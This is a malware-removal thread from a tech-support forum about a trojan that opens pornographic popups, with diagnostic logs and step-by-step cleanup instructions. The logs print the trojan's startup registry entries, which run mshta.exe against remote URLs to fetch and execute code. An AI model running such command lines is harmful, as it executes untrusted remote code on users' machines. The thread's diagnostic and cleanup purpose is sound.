1. Computer problem? Tech Support Guy is completely free -- paid for by advertisers and donations. Click here to join today! If you're new to Tech Support Guy, we highly recommend that you visit our Guide for New Members.

mshta.exe japenese porn popup

Discussion in 'Virus & Other Malware Removal' started by gagraptor, May 23, 2012.

Thread Status:
Not open for further replies.
Advertisement
  1. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    I an constantly getting a pop up from a japanese porn site and the process it uses is MSHTA.exe. if i kill the process it pops up again after 15 or so mins. I have included my hijackthis log below also i ran process explorer on mshta and the command line under image is

    C:\Windows\system32\mshta.exe http://ragmat.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP


    Logfile of Trend Micro HijackThis v2.0.4
    Scan saved at 4:14:56 PM, on 5/23/2012
    Platform: Windows Vista SP2 (WinNT 6.00.1906)
    MSIE: Internet Explorer v8.00 (8.00.6001.19222)
    Boot mode: Normal

    Running processes:
    C:\Windows\system32\Dwm.exe
    C:\Windows\system32\taskeng.exe
    C:\Windows\Explorer.EXE
    C:\Windows\RtHDVCpl.exe
    C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    C:\Program Files\TeamViewer\Version6\TeamViewer.exe
    C:\Program Files\Real\RealPlayer\Update\realsched.exe
    C:\Program Files\Common Files\Java\Java Update\jusched.exe
    C:\Program Files\Windows Sidebar\sidebar.exe
    C:\Program Files\DAEMON Tools Lite\daemon.exe
    C:\Windows\system32\mshta.exe
    C:\Users\GAGAN\Downloads\HijackThis.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe

    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.toshibadirect.com/dpdstart
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.imesh.com/
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.yahoo.com/
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://us.rd.yahoo.com/customize/ie/defaults/su/msgr8/*http://www.yahoo.com
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
    R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://us.rd.yahoo.com/customize/ie/defaults/sp/msgr8/*http://www.yahoo.com
    R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.sweetim.com
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
    R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
    R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
    R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
    R3 - URLSearchHook: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
    O1 - Hosts: ::1 localhost
    O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
    O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
    O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
    O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\ProgramData\Real\RealPlayer\BrowserRecordPlugin\IE\rpbrowserrecordplugin.dll
    O2 - BHO: Increase performance and video formats for your HTML5 <video> - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll
    O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
    O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Oracle\JavaFX 2.0 Runtime\bin\jp2ssv.dll
    O2 - BHO: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
    O3 - Toolbar: Veoh Browser Plug-in - {D0943516-5076-4020-A3B5-AEFAF26AB263} - C:\Program Files\Veoh Networks\Veoh\Plugins\reg\VeohToolbar.dll
    O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
    O3 - Toolbar: Veoh Web Player Video Finder - {0FBB9689-D3D7-4f7a-A2E2-585B10099BFC} - C:\Program Files\Veoh Networks\VeohWebPlayer\VeohIEToolbar.dll
    O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O3 - Toolbar: uTorrentControl Toolbar - {e9df9360-97f8-4690-afe6-996c80790da4} - C:\Program Files\uTorrentControl\prxtbuTor.dll
    O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
    O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
    O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
    O4 - HKLM\..\Run: [Skytel] Skytel.exe
    O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
    O4 - HKLM\..\Run: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
    O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
    O4 - HKLM\..\Run: [TkBellExe] "c:\program files\real\realplayer\Update\realsched.exe" -osboot
    O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
    O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
    O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
    O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
    O4 - HKLM\..\Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
    O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
    O4 - HKCU\..\Run: [Google Update] "C:\Users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe" /c
    O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files\DAEMON Tools Lite\daemon.exe"
    O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
    O4 - HKCU\..\Run: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1
    O4 - HKCU\..\Run: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
    O4 - HKCU\..\RunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://ragmat.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
    O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
    O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
    O4 - HKUS\S-1-5-18\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe (User 'SYSTEM')
    O4 - HKUS\.DEFAULT\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe (User 'Default user')
    O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O10 - Unknown file in Winsock LSP: c:\windows\system32\wpclsp.dll
    O18 - Protocol: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
    O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
    O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\system32\browseui.dll
    O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
    O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Systems - C:\Windows\system32\agrsmsvc.exe
    O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    O23 - Service: Ati External Event Utility - ATI Technologies Inc. - C:\Windows\system32\Ati2evxx.exe
    O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
    O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
    O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
    O23 - Service: McAfee SiteAdvisor Service - McAfee, Inc. - c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
    O23 - Service: TeamViewer 6 (TeamViewer6) - TeamViewer GmbH - C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
    O23 - Service: TOSHIBA Navi Support Service (TNaviSrv) - TOSHIBA Corporation - C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
    O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - TOSHIBA Corporation - C:\Windows\system32\TODDSrv.exe
    O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe

    --
    End of file - 9444 bytes

    Please help drving me nuts not keen on reformatting
     
  2. Mark1956

    Mark1956 Malware Specialist

    Joined:
    May 7, 2011
    Messages:
    14,142
    Hi Gagraptor and welcome to TSG, my name is Mark and I will be helping you.

    At the top of the Malware forum there is a notice Everyone MUST read this BEFORE posting for help in this forum.

    As you have not followed that instruction this may be why you have not received a reply. Please go Here, follow ALL the instructions and post the logs that are requested.

    DO NOT make any attempt to delete mshta.exe as it is a legitimate system file.

    I would also like you to do the following and post the logs, as follows:
    Put the logs into seperate posts if it makes it easier.

    STEP 1
    Run HijackThis, and press "Scan." When the scan is complete place a check mark next to the following entries (if they are still present): (Please be careful and do not check any other boxes)
    NOTE For Windows 7 and Vista you must turn off the User Account Control to allow HJT to run correctly.
    For Vista, click on Start and type User Accounts in the search box and hit Enter, click on Turn User Account Control on or off, uncheck the box to turn off UAC. For Windows 7 click on Start and type UAC in the box and hit Enter, then move the slider all the way to the bottom and click on ok. This action is not required for Windows XP.

    O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - (no file)
    O3 - Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)

    After checking these items CLOSE ALL open windows except HijackThis and click "Fix Checked" to remove the entries you checked. A box will pop up asking you if you wish to fix the selected items. Please choose YES. Once it has fixed them, close HijackThis.
    If you receive an error message that indicates HJT cannot remove the entries please try disabling your security software.How to disable your security software
    If after disabling your security software there is still a problem, this could be due to the Malware on your system.
    Please confirm if the fix runs without a problem. If there is a problem tell me what has happened and post the details of any error messages.
    Follow this by opening HJT, go to the Main Menu and Click on "Do a system scan and save logfile." When the log pops up in Notepad, copy and paste that file back here in your next reply.


    STEP 2




    Please download Malwarebytes Anti-Malware [​IMG] and save it to your desktop.
    • Important!! When you save the mbam-setup file, rename it to something random (such as 123abc.exe) before beginning the download.
    • Double-click on the renamed file to install, then follow these instructions for doing a Quick Scan in normal mode.
    • Don't forget to check for database definition updates through the program's interface (preferable method) before scanning.
    • If you cannot update Malwarebytes or use the Internet to download any files to the infected computer, manually update the database by following the instructions in FAQ Section A: 4. Issues.
    Malwarebytes may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.
    • Double click on the Malwarebytes icon on your desktop to launch the program
    • Under the Scanner tab, make sure the Perform Quick Scan option is selected.
    • Click on the Scan button.
    • When finished, a message box will say "The scan completed successfully. Click Show Results to display all objects found".
    • Click OK to close the message box, then click the Show Results button to see a list of any malware that was found.
    • Make sure that everything is checked and then click Remove Selected.
    • When removal is completed, a log report will open in Notepad.
    • The log is automatically saved and can be viewed by clicking the Logs tab.
    • Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows the database version and your operating system.
    • Exit Malwarebytes when done.
    If Malwarebytes encounters a file that is difficult to remove, you will be asked to reboot your computer so it can proceed with the disinfection process. If asked to restart the computer, please do so immediately. Failure to reboot normally will prevent Malwarebytes from removing all the malware.

    Note: A 14-day trial of Malwarebytes Anti-Malware PRO is available as an option when first installing the free version so all users can test the real-time protection component for a period of two weeks. When the limited time period expires those features will be deactivated and locked. Enabling the Protection Module feature again requires registration and purchase of a license key that includes free lifetime upgrades and support. If you continue to use the free version, there is no requirement to buy a license...you can just use it as a stand-alone scanner.
    NOTE: Some types of malware will target Malwarebytes and other security tools to keep them from running properly. If that's the case, use Malwarebytes Chameleon and follow the onscreen instructions. The Chameleon folder can be accessed by opening the program folder for Malwarebytes Anti-Malware (normally C:\Program Files\Malwarebytes' Anti-Malware or C:\Program Files (x86)\Malwarebytes' Anti-Malware).
     
  3. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    I am sorry i forgot to add other logs. I have followed your instructions, i already had malwarebytes when i run it i get 3 trojans and i'm asked to restart after restarting when i run malwarebytes again i get the same 3 viruses. i am not able to run able to run gmer as my system freezes.
    i'm including all the other logs. PS i also a virtual drive emulation s/w but cant find it to uninstall.
     
  4. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    Malwarebytes Anti-Malware 1.61.0.1400
    www.malwarebytes.org

    Database version: v2012.05.28.01

    Windows Vista Service Pack 2 x86 NTFS
    Internet Explorer 8.0.6001.19222
    GAGAN :: GAGAN-PC [administrator]

    5/28/2012 1:28:46 AM
    mbam-log-2012-05-28 (01-28-46).txt

    Scan type: Quick scan
    Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
    Scan options disabled: P2P
    Objects scanned: 204053
    Time elapsed: 11 minute(s), 4 second(s)

    Memory Processes Detected: 0
    (No malicious items detected)

    Memory Modules Detected: 0
    (No malicious items detected)

    Registry Keys Detected: 0
    (No malicious items detected)

    Registry Values Detected: 3
    HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1 -> Quarantined and deleted successfully.
    HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP -> Quarantined and deleted successfully.
    HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP -> Quarantined and deleted successfully.

    Registry Data Items Detected: 0
    (No malicious items detected)

    Folders Detected: 0
    (No malicious items detected)

    Files Detected: 0
    (No malicious items detected)

    (end)
     
  5. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    .
    DDS (Ver_2011-08-26.01) - NTFSx86
    Internet Explorer: 8.0.6001.19222 BrowserJavaVersion: 10.3.1
    Run by GAGAN at 3:16:57 on 2012-05-28
    Microsoft® Windows Vista&#8482; Home Premium 6.0.6002.2.1252.1.1033.18.1917.1043 [GMT -4:00]
    .
    AV: Microsoft Security Essentials *Enabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
    SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    SP: Microsoft Security Essentials *Enabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
    .
    ============== Running Processes ===============
    .
    C:\Windows\system32\wininit.exe
    C:\Windows\system32\lsm.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch
    C:\Windows\system32\svchost.exe -k rpcss
    c:\Program Files\Microsoft Security Client\MsMpEng.exe
    C:\Windows\system32\Ati2evxx.exe
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
    C:\Windows\system32\svchost.exe -k netsvcs
    C:\Windows\system32\svchost.exe -k GPSvcGroup
    C:\Windows\system32\SLsvc.exe
    C:\Windows\system32\svchost.exe -k LocalService
    C:\Windows\system32\Ati2evxx.exe
    C:\Windows\system32\svchost.exe -k NetworkService
    C:\Windows\System32\spoolsv.exe
    C:\Windows\system32\taskeng.exe
    C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
    C:\Windows\system32\Dwm.exe
    C:\Windows\system32\taskeng.exe
    C:\Windows\Explorer.EXE
    C:\Windows\system32\agrsmsvc.exe
    C:\Windows\system32\svchost.exe -k apphost
    C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
    C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
    C:\Windows\system32\rundll32.exe
    C:\Windows\System32\tcpsvcs.exe
    C:\Windows\system32\svchost.exe -k imgsvc
    C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
    C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
    C:\Windows\system32\TODDSrv.exe
    C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
    C:\Windows\system32\svchost.exe -k iissvcs
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
    C:\Windows\system32\SearchIndexer.exe
    C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
    C:\Windows\System32\alg.exe
    C:\Windows\RtHDVCpl.exe
    C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
    C:\Program Files\Real\RealPlayer\Update\realsched.exe
    C:\Program Files\DivX\DivX Update\DivXUpdate.exe
    C:\Program Files\Common Files\Java\Java Update\jusched.exe
    C:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\Microsoft Security Client\msseces.exe
    C:\Program Files\Windows Sidebar\sidebar.exe
    C:\Program Files\DAEMON Tools Lite\daemon.exe
    C:\Program Files\Synaptics\SynTP\SynToshiba.exe
    C:\Program Files\iPod\bin\iPodService.exe
    C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
    C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
    C:\Windows\system32\taskeng.exe
    C:\Windows\system32\mshta.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Windows\system32\rundll32.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    C:\Users\GAGAN\AppData\Local\Google\Chrome\Application\chrome.exe
    c:\PROGRA~1\mcafee\SITEAD~1\saui.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\SearchProtocolHost.exe
    C:\Windows\system32\SearchFilterHost.exe
    C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe
    .
    ============== Pseudo HJT Report ===============
    .
    uStart Page = hxxp://search.imesh.com/
    uDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
    mStart Page = hxxp://home.sweetim.com
    mDefault_Page_URL = hxxp://www.yahoo.com/
    mDefault_Search_URL = hxxp://us.rd.yahoo.com/customize/ie/defaults/su/msgr8/*http://www.yahoo.com
    mSearch Page = hxxp://us.rd.yahoo.com/customize/ie/defaults/sp/msgr8/*http://www.yahoo.com
    mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
    uInternet Settings,ProxyOverride = *.local
    mSearchAssistant =
    uURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
    mURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
    mURLSearchHooks: H - No File
    BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelper.dll
    BHO: Skype add-on (mastermind): {22bf413b-c6d2-4d91-82a9-a0f997ba588c} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
    BHO: RealPlayer Download and Record Plugin for Internet Explorer: {3049c3e9-b461-4bc5-8870-4c09146192ca} - c:\programdata\real\realplayer\browserrecordplugin\ie\rpbrowserrecordplugin.dll
    BHO: DivX Plus Web Player HTML5 <video>: {326e768d-4182-46fd-9c16-1449a49795f4} - c:\program files\divx\divx plus web player\ie\divxhtml5\DivXHTML5.dll
    BHO: Windows Live ID Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
    BHO: McAfee SiteAdvisor BHO: {b164e929-a1b6-4a06-b104-2cd0e90a88ff} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
    BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\oracle\javafx 2.0 runtime\bin\jp2ssv.dll
    BHO: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
    TB: Veoh Browser Plug-in: {d0943516-5076-4020-a3b5-aefaf26ab263} - c:\program files\veoh networks\veoh\plugins\reg\VeohToolbar.dll
    TB: Veoh Web Player Video Finder: {0fbb9689-d3d7-4f7a-a2e2-585b10099bfc} - c:\program files\veoh networks\veohwebplayer\VeohIEToolbar.dll
    TB: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
    TB: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
    TB: {EEE6C35B-6118-11DC-9C72-001320C79847} - No File
    TB: {A057A204-BACC-4D26-9990-79A187E2698E} - No File
    TB: {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
    uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
    uRun: [<NO NAME>]
    uRun: [Google Update] "c:\users\gagan\appdata\local\google\update\GoogleUpdate.exe" /c
    uRun: [DAEMON Tools Lite] "c:\program files\daemon tools lite\daemon.exe"
    uRun: [Yahoo! Pager] "c:\progra~1\yahoo!\messen~1\YAHOOM~1.EXE" -quiet
    uRun: [SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1
    uRun: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
    uRunOnce: [RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP] mshta.exe http://peachfilm.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP
    mRun: [RtHDVCpl] RtHDVCpl.exe
    mRun: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
    mRun: [Apoint] c:\program files\apoint2k\Apoint.exe
    mRun: [Skytel] Skytel.exe
    mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 8.0\reader\Reader_sl.exe"
    mRun: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
    mRun: [SynTPEnh] c:\program files\synaptics\syntp\SynTPEnh.exe
    mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
    mRun: [TkBellExe] "c:\program files\real\realplayer\update\realsched.exe" -osboot
    mRun: [DivXUpdate] "c:\program files\divx\divx update\DivXUpdate.exe" /CHECKNOW
    mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
    mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
    mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
    mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
    dRun: [Picasa Media Detector] c:\program files\picasa2\PicasaMediaDetector.exe
    mPolicies-explorer: BindDirectlyToPropertySetStorage = 0 (0x0)
    mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
    mPolicies-system: EnableLinkedConnections = 1 (0x1)
    IE: {77BF5300-1474-4EC7-9980-D32B190E9B07} - {77BF5300-1474-4EC7-9980-D32B190E9B07} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
    LSP: c:\windows\system32\wpclsp.dll
    DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
    DPF: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
    DPF: {CAFEEFAC-0017-0000-0003-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
    DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
    TCP: DhcpNameServer = 192.168.1.1
    TCP: Interfaces\{AA0BA040-CE6A-4F94-8BD1-7AFDC60B8156} : DhcpNameServer = 192.168.1.1
    Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
    Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
    Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
    .
    ================= FIREFOX ===================
    .
